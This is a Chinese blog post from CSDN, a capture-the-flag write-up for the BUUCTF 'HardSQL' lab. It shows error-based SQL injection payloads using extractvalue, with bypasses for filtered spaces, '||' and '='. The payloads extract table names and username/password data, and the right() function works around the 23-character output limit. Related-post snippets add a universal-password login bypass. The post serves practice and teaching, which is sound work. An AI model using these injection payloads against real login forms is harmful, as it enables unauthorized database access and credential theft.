[极客大挑战 2019]HardSQL 1

最新推荐文章于 2024-05-07 15:20:25 发布
最新推荐文章于 2024-05-07 15:20:25 发布
阅读量182 收藏
点赞数
分类专栏: CTF-WEB 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46196627/article/details/125206689
版权

一,寻找闭合符’
发现过滤 || 空格 union =
可用 extractvalue updatexml 函数进行报错注入

二,绕过
对|| 可以使用^异或进行注入
对空格 可以 /**/ %0a %0a 等等 尝试后不可使用则使用()来进行绕过

第一种:

admin'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23

第二种:

admin'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))or'1;%00

三 extractvalue长度限制

extractvalue只显示23长度字符串,会导致flag显示不全
可以使用right 函数显示右半部分的值

http://c636cc8b-2dad-4d50-8e21-e2762cc56c95.node4.buuoj.cn:81/check.php?username=admin&password=admin'^extractvalue(1,right(concat(0x7c,(select(group_concat(username,password))from(H4rDsq1))),23))%23
龙咯李
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB】[极客挑战2019]EasySQL WP
Miscedence__的博客
04-15 310
0X0000000000000001 审题 其实由题目可以知道这是道SQL注入,然后看到登录,首先尝试万能密码: admin’ or ‘1’='1 如名字所说,这是一道很ez的SQL注入 通过这道题,我们来延伸一下其他东西 0X0000000000000002 关于万能密码 为什么在注入的时候输入万能密码就可以进入呢,对于所有万能密码,都是”万能“的吗? 那么首先,让我们清楚 SQL注入-万能密码的注入原理 0_用户进行用户名和密码验证时,网站需要查询数据库,查询数据库就是执行SQL语句 //
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
web buuctf [极客挑战 2019]HardSQL1
weixin_44214568的博客
03-15 1948
这题做了一下午,后来翻了一下别人的wp才发现,过滤了空格,服了。。 考点:报错注入 报错注入的应用是sql注入,页面无显示位,但有数据库的报错信息 报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息, 利用updatexml(1,concat(0x7e,database()),2) concat函数将里面内容连成字符串,与xpath的格式不符
BUUCTF [极客挑战 2019]EasySQL 1
最新发布
YueXuan_521的博客
05-07 296
BUUCTF [极客挑战 2019]EasySQL 1
[极客挑战 2019]EasySQL
m0_62709637的博客
05-28 152
重做buu,复习永远回获得你意想不到的知识; 点开后发现是一个登录界面;又因为有题目的提示所以直接寻找注入点(不过都使用登录了码,所以先使用弱口令测试一下) 看来不行 在用万能密码在试一下 发现获得flag 当然题目希望我们使用sql注入,所以我们用sql注入玩一下 (我们知道sql注入的思路是先寻找注入点,然后在一步一步的查询) (这里输入后会报错,因为太久没写懵了以下,后面想起来进行联合注入时需要让前面的输入错误,这样才方便执行之后我们的恶意语句,所以报错之后继
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
BUUCTF[极客挑战 2019] EasySQL 1
m0_75178803的博客
06-12 4271
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [极客挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
BUUCTF靶场练习——第二周
weixin_47063945的博客
07-22 597
整理了buuctf靶场第七第八道web题目的做题笔记并整理了涉及到的部分知识和扩展
buuctf-web-[极客挑战 2019]EasySQL
weixin_43345082的博客
06-17 849
sqlmap一把梭 直接用 payload
极客挑战 2019EasySQL
Lixunzhe0112的博客
01-17 388
admin ’ or 1=1 # + admin //之后又尝试了password后面也是可以进行注入的。尝试用admin+admin进行登陆给出:NO,Wrong username password!然后尝试在uasername后进行sql注入。登陆成功,并且给出了flag。
buuctf-web-[极客挑战 2019]EasySQL1
mlws1900的博客
07-23 400
很明显存在注入点(后面就不写了,想复杂了,以为要闭合还有查库名表名之类的,查库名根本没查到什么东西,看了其他人的wp,直接sqlmap一梭子,还有万能密码)获取环境,题目很明显是sql注入。随机输入一个账号密码测试。......
[极客挑战 2019]EasySQL 1
qq_51553814的博客
08-08 3062
[极客挑战 2019]EasySQL 1 直接进入题 出现了登录界面,是POST注入,既然题目说是EasySQL,那么就猜绕过试试 用户名和密码直接输入1 观察url发现是get注入 于是就直接post绕过 username=‘or’1’=‘1&password=1’or’1’='1 ...
基于联合查询的字符型GET注入
Z_l123的博客
02-16 1088
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解能力。 参赛者需要根据题目要求,在给定的表中使用合适的 SQL 查询语句,筛选出满足条件的数据,并将查询结果返回。 注意:LoveSQL 1是极客挑战2019中的一个具体题目,与其他题目无关。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值